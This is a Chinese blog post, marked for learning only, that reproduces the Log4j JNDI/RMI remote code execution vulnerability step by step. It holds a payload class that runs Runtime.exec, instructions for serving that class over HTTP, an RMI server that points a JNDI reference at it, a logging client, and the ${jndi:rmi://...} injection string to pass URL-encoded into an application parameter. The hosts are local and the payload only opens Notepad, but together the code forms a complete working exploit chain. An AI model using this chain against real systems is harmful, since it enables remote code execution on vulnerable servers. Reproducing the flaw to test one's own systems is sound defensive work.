Log4j 漏洞自查复现(仅供学习,勿它用)

于 2022-01-05 15:17:50 发布
阅读量427 收藏
点赞数
文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W929067865/article/details/122322305
版权

RMI HTTP注入 远程代码执行 漏洞利用 Java安全
关键词由CSDN通过智能技术生成

概念不多说直接上操作

第一步:编写注入类
 

public class BugFinder {

   public BugFinder() {
      try {
         System.out.println("执行漏洞代码");
         // 打开计算器
//       Process rt = Runtime.getRuntime().exec("calc");
         // 打开记事本
         Process rt2 = Runtime.getRuntime().exec("notepad");
         System.out.println("完成执行漏洞代码");
      } catch (Exception e) {
         e.printStackTrace();
      }
   }

   public static void main(String[] args) {
      BugFinder bugFinder = new BugFinder();
   }
}

第二步:用 idea 或 javac 编译获取 BugFinder.class

第三步:将 BugFinder.class 配置成可通过http获取的资源。

如:将 BugFinder.class 直接放入 nginx/html 下 通过 nginx 代理。通过

http://127.0.0.1:80/BugFinder.class 可以访问代表成功。

 第四步:添加 RMI 服务

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {

    public static void main(String[] args) throws Exception {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        Registry registry = LocateRegistry.createRegistry(1099);
        System.out.println("RMI启动,监听:1099 端口");
        Reference reference = new Reference("你的全包路径.BugFinder", "你的全包路径.BugFinder", "http://127.0.0.1:80/BugFinder.class");
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
        registry.bind("hello", referenceWrapper);

        Thread.currentThread().join();
    }
}

 第五步:添加测试客户端,此客户端可以模拟实际情况。

public class RmiClient {

   private static final Logger logger = LogManager.getLogger(RmiClient.class);

   public static void main(String[] args) throws Exception {
      System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
      logger.error("${jndi:rmi://127.0.0.1:1099/hello}");
      Thread.sleep(5000);
   }


   public static void other() throws Exception {
      // JDK 1.8 高版本是关闭的
      System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
      Hashtable env = new Hashtable();
      env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
      env.put(Context.PROVIDER_URL, "rmi://localhost:1099");
      Context ctx = new InitialContext(env);
      ctx.lookup("hello");
   }
}

 第六步:实际接口演示

首先,参数在log4j日志中打印。

之后,将 ${jndi:rmi://127.0.0.1:1099/hello} 通过 UrlEncode 编码后当参数传入接口中即可。

W929067865
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值